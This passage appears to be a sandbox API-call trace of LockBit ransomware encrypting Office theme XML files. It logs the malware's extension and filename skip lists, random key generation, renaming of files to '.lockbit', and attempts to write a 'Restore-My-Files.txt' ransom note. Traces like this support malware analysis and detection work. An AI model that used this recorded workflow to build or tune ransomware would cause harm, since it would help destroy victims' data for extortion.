Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.636] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.636] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.636] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x342eb00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x342eb00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clarity.xml", cAlternateFileName="")) returned 1 [0195.636] lstrcmpiW (lpString1=".", lpString2="Clarity.xml") returned -1 [0195.636] lstrcmpiW (lpString1="..", lpString2="Clarity.xml") returned -1 [0195.636] PathFindExtensionW (pszPath="Clarity.xml") returned=".xml" [0195.636] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.636] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.636] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.636] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.636] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.636] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.636] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.637] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.638] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Clarity.xml") returned 1 [0195.638] lstrcmpiW (lpString1="ntldr", lpString2="Clarity.xml") returned 1 [0195.639] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Clarity.xml") returned 1 [0195.639] lstrcmpiW (lpString1="bootsect.bak", lpString2="Clarity.xml") returned -1 [0195.639] lstrcmpiW (lpString1="autorun.inf", lpString2="Clarity.xml") returned -1 [0195.639] lstrcmpiW (lpString1="thumbs.db", lpString2="Clarity.xml") returned 1 [0195.639] lstrcmpiW (lpString1="iconcache.db", lpString2="Clarity.xml") returned 1 [0195.639] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.639] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml") returned=".xml" [0195.639] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.639] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.639] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.640] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.640] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml.lockbit") returned 85 [0195.640] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\clarity.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.641] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.641] malloc (_Size=0x40068) returned 0x3d70450 [0195.642] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3599) returned 1 [0195.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.642] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0195.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0195.643] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0195.649] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.649] malloc (_Size=0xc0) returned 0x1fa2ed8 [0195.649] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0195.650] free (_Block=0x1fa2ed8) [0195.650] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.650] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.650] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.651] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11910700, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11910700, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Composite.xml", cAlternateFileName="COMPOS~1.XML")) returned 1 [0195.651] lstrcmpiW (lpString1=".", lpString2="Composite.xml") returned -1 [0195.651] lstrcmpiW (lpString1="..", lpString2="Composite.xml") returned -1 [0195.651] PathFindExtensionW (pszPath="Composite.xml") returned=".xml" [0195.651] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.651] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.652] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.653] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Composite.xml") returned 1 [0195.653] lstrcmpiW (lpString1="ntldr", lpString2="Composite.xml") returned 1 [0195.653] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Composite.xml") returned 1 [0195.653] lstrcmpiW (lpString1="bootsect.bak", lpString2="Composite.xml") returned -1 [0195.653] lstrcmpiW (lpString1="autorun.inf", lpString2="Composite.xml") returned -1 [0195.653] lstrcmpiW (lpString1="thumbs.db", lpString2="Composite.xml") returned 1 [0195.653] lstrcmpiW (lpString1="iconcache.db", lpString2="Composite.xml") returned 1 [0195.653] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.653] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml") returned=".xml" [0195.654] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.654] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.654] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.655] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.655] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.655] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.655] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.655] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.655] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.655] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.655] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml.lockbit") returned 87 [0195.655] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\composite.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0195.656] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.656] malloc (_Size=0x40068) returned 0x3f70048 [0195.656] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3598) returned 1 [0195.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0195.657] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0195.657] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0195.663] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.663] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.664] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0195.664] free (_Block=0x1fa2ed8) [0195.664] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.664] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.665] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.665] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeefeee00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeefeee00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Concourse.xml", cAlternateFileName="CONCOU~1.XML")) returned 1 [0195.665] lstrcmpiW (lpString1=".", lpString2="Concourse.xml") returned -1 [0195.665] lstrcmpiW (lpString1="..", lpString2="Concourse.xml") returned -1 [0195.665] PathFindExtensionW (pszPath="Concourse.xml") returned=".xml" [0195.665] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.665] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.666] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.667] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Concourse.xml") returned 1 [0195.667] lstrcmpiW (lpString1="ntldr", lpString2="Concourse.xml") returned 1 [0195.667] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Concourse.xml") returned 1 [0195.667] lstrcmpiW (lpString1="bootsect.bak", lpString2="Concourse.xml") returned -1 [0195.667] lstrcmpiW (lpString1="autorun.inf", lpString2="Concourse.xml") returned -1 [0195.667] lstrcmpiW (lpString1="thumbs.db", lpString2="Concourse.xml") returned 1 [0195.667] lstrcmpiW (lpString1="iconcache.db", lpString2="Concourse.xml") returned 1 [0195.667] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.667] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml") returned=".xml" [0195.667] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.668] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.668] lstrcmpiW 